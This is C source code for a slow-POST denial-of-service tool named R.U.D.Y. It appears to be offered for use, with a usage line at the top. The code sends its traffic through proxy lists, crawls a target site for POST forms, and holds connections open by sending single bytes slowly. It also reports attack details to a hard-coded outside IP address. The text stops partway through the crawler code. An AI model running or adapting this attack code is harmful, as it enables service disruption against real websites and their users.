R.U.D.Y (Layer 7)

1. Note: How To use: http://victim 1 5000 proxies.txt 3600 0 %random%
2.  
3. #include <pthread.h>
4. #include <sys/resource.h>
5. #include <unistd.h>
6. #include <stdio.h>
7. #include <stdlib.h>
8. #include <string.h>
9. #include <signal.h>
10. #include <sys/socket.h>
11. #include <netinet/ip.h>
12. #include <netinet/tcp.h>
13. #include <netdb.h>
14. #include <netinet/in.h>
15. #include <ctype.h>
16. char *useragents[] = {
17. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
18. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
19. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
20. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
21. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
22. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
23. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
24. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
25. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
26. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
27. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
28. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
29. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
30. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
31. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
32. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
33. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
34. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
35. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
36. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
37. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
38. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
39. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
40. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
41. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
42. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
43. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
44. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
45. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
46. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
47. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
48. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
49. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
50. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
51. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
52. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
53. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
54. "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
55. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
56. "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
57. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
58. "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
59. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
60. "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
61. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
62. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
63. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
64. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
65. };
66. #define ATTACKPORT 80
67. char *postformat = "POST /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: #contentlen#\r\n\r\n%s=";
68. char *postpayload;
69. struct urlparts {
70. char * name;
71. char separator[4];
72. char value[128];
73. } parts[] = {
74. { "scheme", ":" },
75. { "userid", "@" },
76. { "password", ":" },
77. { "host", "//" },
78. { "port", ":" },
79. { "path", "/" },
80. { "param", ";" },
81. { "query", "?" },
82. { "fragment", "#" }
83. };
84. enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
85. #define NUMPARTS (sizeof parts / sizeof (struct urlparts))
86. struct urlparts *returnparts[8];
87. struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
88. struct proxy { char *type; char *ip; int port; int working; };
89. struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
90. struct list *head = NULL;
91. char parseError[128];
92. int parseURL(char *url, struct urlparts **returnpart);
93. char * strsplit(char * s, char * tok);
94. char firstpunc(char *s);
95. int strleft(char * s, int n);
96. void setupparts();
97. void freeparts();
98. char *stristr(const char *String, const char *Pattern);
99. char *str_replace(char *orig, char *rep, char *with);
100. char *geturl(char *url, char *useragent, char *ip);
101. char *ipstr;
102.  
103. void *flood(void *par) {
104. struct list *startpoint = (struct list *)par;
105. int i;
106. struct sockaddr_in serverAddr;
107. signal(SIGPIPE, SIG_IGN);
108. while(1)
109. {
110. int sent = 0;
111. if(startpoint->data->working == 0)
112. {
113. startpoint = startpoint->next;
114. sleep(1);
115. continue;
116. }
117. memset(&serverAddr, 0, sizeof(serverAddr));
118. serverAddr.sin_family = AF_INET;
119. serverAddr.sin_port = htons(startpoint->data->port);
120. serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
121. int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
122. u_int yes=1;
123. if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
124. if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
125. {
126. startpoint->data->working = 0;
127. startpoint = startpoint->next;
128. continue;
129. }
130. if(strcmp(startpoint->data->type, "Socks4")==0)
131. {
132. unsigned char buf[10];
133. buf[0] = 0x04;
134. buf[1] = 0x01;
135. *(unsigned short*)&buf[2] = htons(ATTACKPORT);
136. *(unsigned long*)&buf[4] = inet_addr(ipstr);
137. buf[8] = 0x00;
138. if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
139. {
140. startpoint->data->working = 0;
141. startpoint = startpoint->next;
142. close(serverSocket);
143. continue;
144. }
145. }
146. if(strcmp(startpoint->data->type, "Socks5")==0)
147. {
148. unsigned char buf[20];
149. buf[0] = 0x05;
150. buf[1] = 0x01;
151. buf[2] = 0x00;
152. if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
153. {
154. startpoint->data->working = 0;
155. startpoint = startpoint->next;
156. close(serverSocket);
157. continue;
158. }
159. buf[0] = 0x05;
160. buf[1] = 0x01;
161. buf[2] = 0x00;
162. buf[3] = 0x01;
163. *(unsigned long*)&buf[4] = inet_addr(ipstr);
164. *(unsigned short*)&buf[8] = htons(ATTACKPORT);
165. if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
166. {
167. printf("BAD PROXY ONLY SENT %d:%d\n", sent, 10);
168. perror("send 10");
169. startpoint->data->working = 0;
170. startpoint = startpoint->next;
171. close(serverSocket);
172. continue;
173. }
174. }
175. char *length = (char *)malloc(255);
176. sprintf(length, "%d", ((rand() % 10000) + 20000));
177. char *httppartpayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
178. char *httppayload = str_replace(httppartpayload, "#contentlen#", length);
179. free(httppartpayload);
180. if(httppayload == NULL)
181. {
182. startpoint = startpoint->next;
183. close(serverSocket);
184. continue;
185. }
186. sent = send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
187. //printf("sent main payload %d\n", sent);
188. free(httppayload);
189. //char *postshit = "Z";
190. //while(send(serverSocket, postshit, 1, MSG_NOSIGNAL) > 0)
191. // {
192. // sleep(1);
193. //printf(".");
194. // }
195. int success;
196. do
197. {
198. char postshit = rand() % 97 + 26;
199. success = send(serverSocket, &postshit, 1, MSG_NOSIGNAL);
200. sleep(rand() % 3 + 1);
201. //printf(".");
202. } while (success > 0);
203. close(serverSocket);
204. usleep(30000);
205. //startpoint = startpoint->next;
206. }
207. }
208.  
209. int fnAttackInformation(int attackID)
210. {
211. char szRecvBuff[1024];
212. char packet[1024];
213. char ip[] = "37.221.170.5";
214.  
215. snprintf(packet, sizeof(packet) - 1, "GET /~dqyefldi/response.php?auth=tru&id=%d&pro=%d HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nCache-Control: no-cache\r\nOrigin: http://google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\nAccept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n", attackID, getpid(), ip);
216.  
217. struct sockaddr_in *remote;
218. int sock;
219. int tmpres;
220.  
221.  
222. if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
223. {
224. perror("Can't create TCP socket");
225. exit(1);
226. }
227.  
228. remote = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in *));
229. remote->sin_family = AF_INET;
230. tmpres = inet_pton(AF_INET, ip, (void *)(&(remote->sin_addr.s_addr)));
231.  
232. if (tmpres < 0)
233. {
234. perror("Can't set remote->sin_addr.s_addr");
235. exit(1);
236. }
237. else if (tmpres == 0)
238. {
239. fprintf(stderr, "%s is not a valid IP address\n", ip);
240. exit(1);
241. }
242.  
243. remote->sin_port = htons(80);
244.  
245. if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0)
246. {
247. perror("Could not connect");
248. exit(1);
249. }
250.  
251. tmpres = send(sock, packet, strlen(packet), 0);
252.  
253. //printf("Sent %d bytes -> \n%s\n\n\n", tmpres, packet);
254.  
255. if (tmpres == -1){
256. perror("Can't send query");
257. exit(1);
258. }
259.  
260. int i = 1;
261. int dwTotal = 0;
262.  
263.  
264. while (1)
265. {
266. i = recv(sock, szRecvBuff + dwTotal, sizeof(szRecvBuff) - dwTotal, 0);
267. //printf("Received %d bytes\n", i);
268. if (i <= 0)
269. break;
270.  
271. dwTotal += i;
272. }
273.  
274. szRecvBuff[dwTotal] = '\0';
275.  
276.  
277. //printf("Received -> \n%s\n\n", szRecvBuff);
278.  
279.  
280. close(sock);
281.  
282. //printf("Sent %d bytes\n", tmpres);
283.  
284. return 0;
285. }
286.  
287. int main(int argc, char *argv[ ]) {
288. if(argc < 5){
289. fprintf(stderr, "Invalid parameters!\n");
290. fprintf(stdout, "Usage: %s <target url> <auto scrape (1 or 0)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [manual parameter]\n", argv[0]);
291. exit(-1);
292. }
293. //fprintf(stdout, "Setting up Sockets...\n");
294. int num_threads = atoi(argv[3]);
295. int scrapeit = atoi(argv[2]);
296. FILE *pFile = fopen(argv[4], "rb");
297. if(pFile==NULL)
298. {
299. perror("fopen"); exit(1);
300. }
301. fseek(pFile, 0, SEEK_END);
302. long lSize = ftell(pFile);
303. rewind(pFile);
304. char *buffer = (char *)malloc(lSize*sizeof(char));
305. fread(buffer, 1, lSize, pFile);
306. fclose (pFile);
307. int i=0;
308. char *pch = (char *)strtok(buffer, ":");
309. while(pch != NULL)
310. {
311. if(head == NULL)
312. {
313. head = (struct list *)malloc(sizeof(struct list));
314. bzero(head, sizeof(struct list));
315. head->data = (struct proxy *)malloc(sizeof(struct proxy));
316. bzero(head->data, sizeof(struct proxy));
317. head->data->working = 1;
318. head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
319. pch = (char *)strtok(NULL, ":");
320. if(pch == NULL) exit(-1);
321. head->data->port = atoi(pch);
322. pch = (char *)strtok(NULL, ":");
323. head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
324. pch = (char *)strtok(NULL, ":");
325. head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
326. head->next = head;
327. head->prev = head;
328. } else {
329. struct list *new_node = (struct list *)malloc(sizeof(struct list));
330. bzero(new_node, sizeof(struct list));
331. new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
332. bzero(new_node->data, sizeof(struct proxy));
333. new_node->data->working = 1;
334. new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
335. pch = (char *)strtok(NULL, ":");
336. if(pch == NULL) break;
337. new_node->data->port = atoi(pch);
338. pch = (char *)strtok(NULL, ":");
339. new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
340. pch = (char *)strtok(NULL, ":");
341. new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
342. new_node->prev = head;
343. new_node->next = head->next;
344. head->next = new_node;
345. }
346. }
347. free(buffer);
348. const rlim_t kOpenFD = 1024 + (num_threads * 2);
349. struct rlimit rl;
350. int result;
351. rl.rlim_cur = kOpenFD;
352. rl.rlim_max = kOpenFD;
353. result = setrlimit(RLIMIT_NOFILE, &rl);
354. if (result != 0)
355. {
356. perror("setrlimit");
357. fprintf(stderr, "setrlimit returned result = %d\n", result);
358. }
359. char *parameter;
360. if(argc > 7)
361. {
362. parameter = argv[7];
363. } else {
364. parameter = "username";
365. }
366. setupparts();
367. parseURL(argv[1], returnparts);
368. if(argc > 6 && !(strcmp(argv[6], "0") == 0))
369. {
370. ipstr = malloc(strlen(argv[6])+1);
371. strcpy(ipstr, argv[6]);
372. //fprintf(stdout, "Using manual IP...\n");
373. } else {
374. struct hostent *he;
375. struct in_addr a;
376. he = gethostbyname(returnparts[host]->value);
377. if (he)
378. {
379. while (*he->h_addr_list)
380. {
381. bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
382. ipstr = malloc(INET_ADDRSTRLEN+1);
383. inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
384. break;
385. }
386. }
387. else
388. { herror("gethostbyname"); }
389. }
390. char *targeturl = argv[1];
391. char *targetparameter = parameter;
392. if(scrapeit == 1)
393. {
394. char *original_domain = malloc(strlen(returnparts[host]->value)+1);
395. strcpy(original_domain, returnparts[host]->value);
396. freeparts();
397. struct urllist *headurl = malloc(sizeof(struct urllist));
398. bzero(headurl, sizeof(struct urllist));
399. headurl->url = argv[1];
400. headurl->done = 0;
401. headurl->next = headurl;
402. headurl->prev = headurl;
403. int donescrape = 0;
404. char *lasturl = "";
405. while(headurl->done == 0)
406. {
407. if(headurl->url == NULL)
408. {
409. headurl->done = 1;
410. headurl = headurl->next;
411. continue;
412. }
413. if(strcmp(headurl->url, lasturl) == 0)
414. {
415. headurl->done = 1;
416. headurl = headurl->next;
417. continue;
418. }
419. lasturl = headurl->url;
420. printf("Scraping: %s\n", headurl->url);
421. char *buffer = geturl(headurl->url, useragents[rand() % (sizeof(useragents)/sizeof(char *))], ipstr);
422. if(strstr(buffer, "\r\n\r\n")==NULL)
423. {
424. free(buffer);
425. headurl->done = 1;
426. headurl = headurl->next;
427. continue;
428. }
429. char *headerstatus = malloc(strstr(buffer, "\r\n\r\n") - buffer + 3);
430. memcpy(headerstatus, buffer, strstr(buffer, "\r\n\r\n") - buffer + 2);
431. char *body = buffer + (strstr(buffer, "\r\n\r\n") - buffer + 2) + 2;
432. int status = atoi(strchr(strncpy(malloc(1024),headerstatus,strstr(headerstatus, "\r\n") - headerstatus), ' ') + 1);
433. char *headers = strstr(headerstatus, "\r\n")+2;
434. int temp = ((status/10)/10) % 10;
435. if(temp == 4)
436. {
437. free(headerstatus);
438. free(buffer);
439. headurl->done = 1;
440. headurl = headurl->next;
441. continue;
442. }
443. if(temp == 3)
444. {
445. char *location = stristr(headers, "Location: ") + 10;
446. if(location == NULL)
447. {
448. free(headerstatus);
449. free(buffer);
450. headurl->done = 1;
451. headurl = headurl->next;
452. continue;
453. }
454. struct urllist *newurl = malloc(sizeof(struct urllist));
455. bzero(newurl, sizeof(struct urllist));
456. char *nexturl = malloc(strstr(location, "\r\n") - location + 1);
457. bzero(nexturl, strstr(location, "\r\n") - location + 1);
458. strncpy(nexturl, location, strstr(location, "\r\n") - location);
459. char *parsednexturl;
460. setupparts();
461. parseURL(nexturl, returnparts);
462. if(!(*(returnparts[path]->value)))
463. {
464. free(headerstatus);
465. free(buffer);
466. headurl->done = 1;
467. headurl = headurl->next;
468. continue;
469. }
470. if(*(returnparts[host]->value))
471. {
472. char *host_tmp = str_replace(returnparts[host]->value, "www.", "");
473. if(host_tmp != NULL)
474. {
475. if(strcmp(host_tmp, original_domain) != 0)
476. {
477. free(headerstatus);
478. free(buffer);
479. headurl->done = 1;
480. headurl = headurl->next;
481. continue;
482. } else {
483. original_domain = malloc(strlen(returnparts[host]->value)+1);
484. bzero(original_domain, strlen(returnparts[host]->value)+1);
485. strcpy(original_domain, returnparts[host]->value);
486. }
487.  
488. } else {
489. if(strcmp(returnparts[host]->value, original_domain) != 0)
490. {
491. free(headerstatus);
492. free(buffer);
493. headurl->done = 1;
494. headurl = headurl->next;
495. continue;
496. }
497. }
498.  
499. parsednexturl = malloc(strlen(nexturl)+1);
500. bzero(parsednexturl, strlen(nexturl)+1);
501. strcpy(parsednexturl, nexturl);
502. } else {
503. parsednexturl = malloc(7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
504. bzero(parsednexturl, 7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
505. strcpy(parsednexturl, "http://");
506. strcpy(parsednexturl + 7, original_domain);
507. strcpy(parsednexturl + 7 + strlen(original_domain), "/");
508. strcpy(parsednexturl + 7 + strlen(original_domain) + 1, returnparts[path]->value);
509. char *tmp = malloc(strlen(original_domain)+2);
510. bzero(tmp, strlen(original_domain)+2);
511. sprintf(tmp, "%s/", original_domain);
512. char *tmp2 = malloc(strlen(original_domain)+3);
513. bzero(tmp2, strlen(original_domain)+3);
514. sprintf(tmp2, "%s//", original_domain);
515. char *parsednexturl_tmp = str_replace(parsednexturl, tmp2, tmp);
516. if(parsednexturl_tmp != NULL)
517. {
518. free(parsednexturl);
519. parsednexturl = parsednexturl_tmp;
520. }
521. free(tmp);
522. free(tmp2);
523. }
524. freeparts();
525. free(nexturl);
526.  
527. newurl->url = parsednexturl;
528. newurl->done = 0;
529. newurl->next = headurl->next;
530. newurl->prev = headurl;
531. headurl->next = newurl;
532. headurl->done = 1;
533. headurl = headurl->next;
534. free(headerstatus);
535. free(buffer);
536. continue;
537. }
538. char *formstart = body;
539. while(stristr(formstart, "<form")!=NULL)
540. {
541. formstart = stristr(formstart, "<form")+5;
542. char *formend = stristr(formstart, "</form");
543. char *input = formstart;
544. char *method = stristr(formstart, "method=");
545. if(method == NULL || method > stristr(formstart, ">"))
546. {
547. continue;
548. }
549. char *methodstart = method+7;
550. char *methodname = NULL;
551. if(strchr(methodstart, '"')!=NULL && strchr(methodstart, '>') > strchr(methodstart, '"'))
552. {
553. methodstart = strchr(method, '"')+1;
554. methodname = malloc(strchr(methodstart, '"') - methodstart + 1);
555. bzero(methodname, strchr(methodstart, '"') - methodstart + 1);
556. strncpy(methodname, methodstart, strchr(methodstart, '"') - methodstart);
557. } else if(strchr(methodstart, '\'')!=NULL && strchr(methodstart, '>') > strchr(methodstart, '\''))
558. {
559. methodstart = strchr(method, '\'')+1;
560. methodname = malloc(strchr(methodstart, '\'') - methodstart + 1);
561. bzero(methodname, strchr(methodstart, '\'') - methodstart + 1);
562. strncpy(methodname, methodstart, strchr(methodstart, '\'') - methodstart);
563. } else {
564. char *end = NULL;
565. if(strchr(methodstart, ' ') > strchr(methodstart, '>'))
566. {
567. end = strchr(methodstart, '>');
568. } else {
569. end = strchr(methodstart, ' ');
570. }
571. methodname = malloc(end - methodstart + 1);
572. bzero(methodname, end - methodstart + 1);
573. strncpy(methodname, methodstart, end - methodstart);
574. }
575. int i;
576. for(i=0;*(methodname + i);i++)
577. {
578. *(methodname + i) = toupper(*(methodname + i));
579. }
580. if(strcmp(methodname, "GET") == 0)
581. {
582. continue;
583. }
584. char *action = stristr(formstart, "action=");
585. char *actionname = NULL;
586. if(action == NULL || action > formend)
587. {
588. actionname = headurl->url;
589. } else {
590. char *actionstart = action;
591. if(strchr(actionstart, '"') != NULL && strchr(actionstart, '>') > strchr(actionstart, '"'))
592. {
593. actionstart = strchr(action, '"')+1;
594. actionname = malloc(strchr(actionstart, '"') - actionstart + 1);
595. bzero(actionname, strchr(actionstart, '"') - actionstart + 1);
596. strncpy(actionname, actionstart, strchr(actionstart, '"') - actionstart);
597. } else if(strchr(actionstart, '\'') != NULL && strchr(actionstart, '>') > strchr(actionstart, '\''))
598. {
599. actionstart = strchr(action, '\'')+1;
600. actionname = malloc(strchr(actionstart, '\'') - actionstart + 1);
601. bzero(actionname, strchr(actionstart, '\'') - actionstart + 1);
602. strncpy(actionname, actionstart, strchr(actionstart, '\'') - actionstart);
603. } else {
604. char *end = NULL;
605. if(strchr(actionstart, ' ') > strchr(actionstart, '>'))
606. {
607. end = strchr(actionstart, '>');
608. } else {
609. end = strchr(actionstart, ' ');
610. }
611. actionname = malloc(end - action + 1);
612. bzero(actionname, end - action + 1);
613. strncpy(actionname, action, end - action);
614. }
615. }
616. if(strcmp(actionname, "") == 0)
617. {
618. free(actionname);
619. actionname = headurl->url;
620. }
621. while((input = stristr(input, "<input")) != NULL)
622. {
623. input = input + 6;
624. char *inputname = stristr(input, "name=");
625. if(inputname != NULL)
626. {
627. inputname = inputname+5;
628. char *namestart = inputname;
629. char *name;
630. if(strchr(inputname, '"')!=NULL && strchr(inputname, '>') > strchr(inputname, '"'))
631. {
632. namestart = strchr(inputname, '"')+1;
633. name = malloc(strchr(namestart, '"') - namestart + 1);
634. bzero(name, strchr(namestart, '"') - namestart + 1);
635. strncpy(name, namestart, strchr(namestart, '"') - namestart);
636. } else if(strchr(inputname, '\'')!=NULL && strchr(inputname, '>') > strchr(inputname, '\''))
637. {
638. namestart = strchr(inputname, '\'')+1;
639. name = malloc(strchr(namestart, '\'') - namestart + 1);
640. bzero(name, strchr(namestart, '\'') - namestart + 1);
641. strncpy(name, namestart, strchr(namestart, '\'') - namestart);
642. } else {
643. char *end = NULL;
644. if(strchr(inputname, ' ') > strchr(inputname, '>'))
645. {
646. end = strchr(inputname, '>');
647. } else {
648. end = strchr(inputname, ' ');
649. }
650. name = malloc(end - inputname + 1);
651. bzero(name, end - inputname + 1);
652. strncpy(name, namestart, end - inputname);
653. }
654. targetparameter = name;
655. setupparts();
656. parseURL(actionname, returnparts);
657. if(!(*(returnparts[path]->value)))
658. {
659. goto NOTRIGHT;
660. }
661. if(*(returnparts[host]->value))
662. {
663. if(strcmp(returnparts[host]->value, original_domain) != 0)
664. {
665. goto NOTRIGHT;
666. }
667. targeturl = actionname;
668. } else {
669. targeturl = malloc(7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
670. bzero(targeturl, 7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
671. strcpy(targeturl, "http://");
672. strcpy(targeturl + 7, original_domain);
673. strcpy(targeturl + 7 + strlen(original_domain), "/");
674. strcpy(targeturl + 7 + strlen(original_domain) + 1, returnparts[path]->value);
675. char *tmp = malloc(strlen(original_domain)+2);
676. bzero(tmp, strlen(original_domain)+2);
677. sprintf(tmp, "%s/", original_domain);
678. char *tmp2 = malloc(strlen(original_domain)+3);
679. bzero(tmp2, strlen(original_domain)+3);
680. sprintf(tmp2, "%s//", original_domain);
681. char *targeturl_tmp = str_replace(targeturl, tmp2, tmp);
682. if(targeturl_tmp != NULL)
683. {
684. free(targeturl);
685. targeturl = targeturl_tmp;
686. }
687. free(tmp);
688. free(tmp2);
689. }
690. freeparts();
691. free(headerstatus);
692. free(buffer);
693. printf("TARGET AQUIRED: %s, %s\n", targeturl, targetparameter);
694. goto END;
695. }
696. }
697. NOTRIGHT:
698. continue;
699. }
700. char *link = body;
701. while((link = stristr(link, "<a ")) != NULL)
702. {
703. link = link+3;
704. char *href = stristr(link, "href=");
705. if(href == NULL || href > stristr(link, ">"))
706. {
707. continue;
708. }
709. href = href + 5;
710. char *hrefstart = href;
711. char *hreftarget;
712. if(strchr(hrefstart, '"')!=NULL && strchr(hrefstart, '>') > strchr(hrefstart, '"'))
713. {
714. hrefstart = strchr(hrefstart, '"')+1;
715. hreftarget = malloc(strchr(hrefstart, '"') - hrefstart + 1);
716. bzero(hreftarget, strchr(hrefstart, '"') - hrefstart + 1);
717. strncpy(hreftarget, hrefstart, strchr(hrefstart, '"') - hrefstart);
718. } else if(strchr(hrefstart, '\'')!=NULL && strchr(hrefstart, '>') > strchr(hrefstart, '\''))
719. {
720. hrefstart = strchr(hrefstart, '\'')+1;
721. hreftarget = malloc(strchr(hrefstart, '\'') - hrefstart + 1);
722. bzero(hreftarget, strchr(hrefstart, '\'') - hrefstart + 1);
723. strncpy(hreftarget, hrefstart, strchr(hrefstart, '\'') - hrefstart);
724. } else {
725. char *end = NULL;
726. if(strchr(hrefstart, ' ') > strchr(hrefstart, '>'))
727. {
728. end = strchr(hrefstart, '>');
729. } else {
730. end = strchr(hrefstart, ' ');
731. }
732. hreftarget = malloc(end - hrefstart + 1);
733. bzero(hreftarget, end - hrefstart + 1);
734. strncpy(hreftarget, hrefstart, end - hrefstart);
735. }
736. if(strcmp(hreftarget, "#") == 0 || stristr(hreftarget, "javascript:") != NULL)
737. {
738. free(hreftarget);
739. continue;
740. }
741. char *scrapenext;
742. setupparts();
743. parseURL(hreftarget, returnparts);
744. if(!(*(returnparts[path]->value)))
745. {
746. freeparts();
747. continue;
748. }
749. if(*(returnparts[host]->value))
750. {
751. if(strcmp(returnparts[host]->value, original_domain) != 0)
752. {
753. freeparts();
754. continue;
755. }
756. scrapenext = hreftarget;
757. } else {
758. scrapenext = malloc(7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
759. bzero(scrapenext, 7 + strlen(original_domain) + 1 + strlen(returnparts[path]->value) + 1);
760. strcpy(scrapenext, "http://");
761. strcpy(scrapenext + 7, original_domain);
762. strcpy(scrapenext + 7 + strlen(original_domain), "/");
763. strcpy(scrapenext + 7 + strlen(original_domain) + 1, returnparts[path]->value);
764. char *tmp = malloc(strlen(original_domain)+2);
765. bzero(tmp, strlen(original_domain)+2);
766. sprintf(tmp, "%s/", original_domain);
